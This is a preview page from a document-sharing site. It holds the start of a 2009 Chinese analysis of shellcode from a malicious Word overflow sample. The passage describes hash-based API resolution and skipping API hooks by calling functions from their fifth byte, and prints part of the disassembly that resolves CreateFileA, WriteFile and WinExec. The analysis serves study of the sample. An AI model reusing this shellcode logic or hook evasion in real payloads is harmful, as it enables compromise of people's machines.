网站大量收购独家精品文档,联系QQ:2885784924

Word溢出Shellcode分析.doc

  1. 1、本文档共13页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Word溢出Shellcode分析

Word溢出Shellcode分析 Word溢出Shellcode分析 阅读:37 时间:2009-8-16 6:35:08 整理:华夏黑盟 ------------------------------------------------------------------ 前段时间从朋友处拿到一个Word的溢出样本,看了下,应该是很老的漏洞洞了,Office2003不开补丁有效,打了SP补丁就无效,本时我对这方面研究的不太多,就分析分析当学习。 这里不进溢出的原因、构造什么的,只分析它的Shellcode,它的Shellcode也是有两段的,重点功能在第二段上,里面用到了不少不错的想法,它有以下特点: 1。在Kernel32 模块中查找API用了HASH法,方便并可缩小shellcode体积。 2。里面有一段根据文件大小获得文件句柄的算法很巧妙。 3。Shellcode调用CreateFileA、Winexec时考虑了此函数可能被Hook,从函数开头第5字节开始执行。 07fe6000 55 push ebp 07fe6001 8bec mov ebp,esp 07fe6003 81e sub esp,560h 07fe6009 8bf4 mov esi,esp 07fe600b e8d8020000 call 07fe62e8 07fe6010 8906 mov dword ptr [esi],eax //7c800000 07fe6012 895e04 mov dword ptr [esi+4],ebx 07fe6015 ff36 push dword ptr [esi] 07fe6017 68a517007c push 7C0017A5h 07fe601c e8fa020000 call 07fe631b 07fe6021 894608 mov dword ptr [esi+8],eax//CreateFileA 07fe6024 ff36 push dword ptr [esi] 07fe6026 681f790ae8 push 0E80A791Fh 07fe602b e8eb020000 call 07fe631b 07fe6030 89460c mov dword ptr [esi+0Ch],eax//WriteFile 07fe6033 ff36 push dword ptr [esi] 07fe6035 68fb97fd0f push 0FFD97FBh 07fe603a e8dc020000 call 07fe631b 07fe603f 894610 mov dword ptr [esi+10h],eax//CloseHandle 07fe6042 ff36 push dword ptr [esi] 07fe6044 6898fe8a0e push 0E8AFE98h 07fe6049 e8cd020000 call 07fe631b 07fe604e 894614 mov dword ptr [esi+14h],eax//WinExec 07fe6051 ff36 push dword ptr [esi] 07fe6053 683b4743dd push 0DD43473Bh 07fe6058 e8be020000 call 07fe631b 07fe605d 89462c mov dword ptr [esi+2Ch],eax//lstrlenA 07fe6060 ff36 push dword ptr [esi] 07fe6062 68fb499bcb push 0CB9B49FBh 07fe6067 e8af020000 call 07fe631b 07fe606c 894630 mov dword ptr [esi+30h],eax//lstrcpyA 07fe606f ff36

文档评论(0)

htfyzc + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档